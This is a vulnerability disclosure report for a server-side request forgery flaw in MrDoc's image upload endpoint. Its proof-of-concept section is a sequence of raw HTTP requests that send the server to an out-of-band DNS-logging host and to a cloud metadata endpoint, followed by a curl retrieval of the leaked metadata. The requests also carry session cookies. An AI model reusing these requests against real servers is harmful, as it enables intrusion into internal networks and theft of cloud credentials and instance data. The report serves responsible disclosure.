Description

● SSRF in /upload_doc_img/, an attacker could abuse url to visit any intranet in the envioronment of MrDoc server, casuing breaking the border of network. ● Depending on the different env, it could leak sensitive meta-data，according to https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb#gistcomment-3882255

Proof of Concept

HTTP request , tested on http://mrdoc.zmister.com/modify_doc/3778/

POST /upload_doc_img/ HTTP/1.1
Host: mrdoc.zmister.com
Content-Length: 88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
DNT: 1
Content-Type: application/json; charset=UTF-8
Accept: */*
Origin: http://mrdoc.zmister.com
Referer: http://mrdoc.zmister.com/create_doc/?pid=930
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: Hm_lvt_95f55ea1c5936e35e732966bef35e4a5=1634395760; csrftoken=b4FuQm8mnBKS8oZPUlF9HuKamFy7qXCow0jeuGXgcTdFhhYWOrbJf2G5MuxTPj0Z; sessionid=mu3ptwhqzhmqnnmywvi3jpiwzybpx91b; Hm_lpvt_95f55ea1c5936e35e732966bef35e4a5=1634400403
Connection: close

{"url":"http://upload_doc_img.0yuj7c.ceye.io/media/202110/2021-10-17_000846_478019.png"}

DNSLOG response

（2）Leaking sentitive content According to cloud_metadata.txt, I could retrieve the cloud_metadata of mrdoc.zmister.com（123.207.234.22） Firstly，

POST /upload_doc_img/ HTTP/1.1
Host: mrdoc.zmister.com
Content-Length: 58
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
DNT: 1
Content-Type: application/json; charset=UTF-8
Accept: */*
Origin: http://mrdoc.zmister.com
Referer: http://mrdoc.zmister.com/create_doc/?pid=930
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: Hm_lvt_95f55ea1c5936e35e732966bef35e4a5=1634395760; csrftoken=b4FuQm8mnBKS8oZPUlF9HuKamFy7qXCow0jeuGXgcTdFhhYWOrbJf2G5MuxTPj0Z; sessionid=mu3ptwhqzhmqnnmywvi3jpiwzybpx91b; Hm_lpvt_95f55ea1c5936e35e732966bef35e4a5=1634400403
Connection: close

{"url":"http://metadata.tencentyun.com/latest/meta-data/"}

response from the mrdoc server should be like：

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 16 Oct 2021 16:41:27 GMT
Content-Type: application/json
Content-Length: 163
Connection: close
X-Frame-Options: SAMEORIGIN
Vary: Accept-Language, Cookie
Content-Language: zh-hans
Expires: Sun, 17 Oct 2021 04:41:27 GMT
Cache-Control: max-age=43200
Cache-Control: no-cache

{"msg": "", "code": 0, "data": {"originalURL": "http://metadata.tencentyun.com/latest/meta-data/", "url": "/media/202110/2021-10-17_0041270.8239697654653059.png"}}

● So, we could retrieve it by

curl  http://mrdoc.zmister.com/media/202110/2021-10-17_0041270.8239697654653059.png

res:
app-id                                                           
instance-id                                                      
local-ipv4                                                       
mac                                                              
public-ipv4                                                      
uuid                                                             
instance-name                                                    
placement/                                                       
payment/                                                         
network/                                                         
volumes/                                                         
instance/                                                        
public-keys/                                                     
ntp/* 

Impact

This vulnerability is capable of HTTP GET to arbitrary URLs： ● Including the private networks ● Full response by retrieving the according PNG ● Thus, disclosing some sensitive content such as Cloud-Metadata